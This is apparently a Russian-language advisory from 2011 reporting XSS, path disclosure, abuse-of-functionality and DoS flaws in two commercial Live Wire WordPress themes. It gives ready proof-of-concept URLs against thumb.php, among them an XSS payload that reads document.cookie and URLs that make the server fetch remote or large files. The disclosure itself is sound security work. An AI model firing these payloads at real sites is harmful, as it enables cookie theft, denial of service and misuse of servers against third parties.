Уязвимости в темах Live Wire 2.0 и Live Wire Style для WordPress

2011-04-13T00:00:00
ID SECURITYVULNS:DOC:26099
Type securityvulns
Reporter Securityvulns
Modified 2011-04-13T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting, Full path disclosure, Abuse of Functionality и Denial of Service уязвимостях в темах Live Wire 2.0 и Live Wire Style для WordPress. Это ещё две темы, которые вместе с Live Wire Edition входят в серию Live Wire. Это коммерческие шаблоны для WP.

XSS (WASC-08):

http://site/wp-content/themes/livewire/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/livewire/thumb.php?src=jpg

http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1111111&w=1

http://site/wp-content/themes/livewire/

А также ещё 30 php-скриптов шаблона в папке /livewire/ и всех подпапках.

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/livewire/thumb.php?src=http://site&h=1&w=1

DoS (WASC-10):

http://site/wp-content/themes/livewire/thumb.php?src=http://site/big_file&h=1&w=1

О подобных AoF и DoS уязвимостях я писал в статье Использование сайтов для атаки на другие сайты (http://websecurity.com.ua/4322/).

Кроме папки /livewire/, данные темы также могут размещаться в папках /livewire-dev/ и /livewire-package/ (это пакет, который включает все три темы Live Wire серии).

Уязвимы Live Wire 2.0 и Live Wire Style версия 2.3.1 и предыдущие версии. XSS возможна лишь в старых версиях шаблона. После моего уведомления, разработчик исправил Abuse of Functionality, DoS и некоторые FPD, но всё ещё осталось много неисправленных FPD.

Дополнительная информация о данных уязвимостях у меня на сайте:

http://websecurity.com.ua/4907/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua